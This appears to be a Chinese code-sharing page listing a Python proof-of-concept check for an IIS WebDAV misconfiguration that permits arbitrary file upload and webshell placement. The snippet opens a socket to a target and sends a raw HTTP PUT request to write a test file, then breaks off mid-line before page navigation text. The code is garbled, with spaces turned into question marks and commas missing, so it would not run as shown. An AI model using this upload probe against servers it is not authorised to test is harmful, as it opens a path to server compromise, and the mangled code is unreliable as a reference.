資源簡介
name: IIS WebDav
info: "開啟了WebDav且配置不當可導致攻擊者直接上傳webshell,進而導致服務器被入侵控制。
level: 緊急
type: 任意文件上傳
repair: 禁用 IIS 的 WebDAV 服務
代碼片段和文件信息
?#!/usr/bin/env?python
#?-*-?coding:utf-8?-*-
‘‘‘
????name:?IIS?WebDav
????info:?“開啟了WebDav且配置不當可導致攻擊者直接上傳webshell,進而導致服務器被入侵控制。
????level:?緊急
????type:?任意文件上傳
????repair:?禁用?IIS?的?WebDAV?服務
‘‘‘
import?sysos
import?socketurllib2time
from?POC_framework?import?POC
class?myPOC10(POC):
????
????#單IP的POC
????def?check(self?ip?port?timeout=5):
????????try:
????????????socket.setdefaulttimeout(timeout)
????????????s?=?socket.socket(socket.AF_INET?socket.SOCK_STREAM)
????????????s.connect((ip?port))
????????????flag?=?“PUT?/vultest.txt?HTTP/1.1\r\nHost:?%s:%d\r\nContent-Length:?9\r\n\r\nscan\r\n\r\n“?%?(ip?port)
????????????s.send(flag)
????????????time.sleep(1)
????????????data?=?s.rec - 上一篇:Tarcotron2(文本轉語音)
- 下一篇:基于python的三層神經網絡模型搭建
評論
共有 條評論
川公網安備 51152502000135號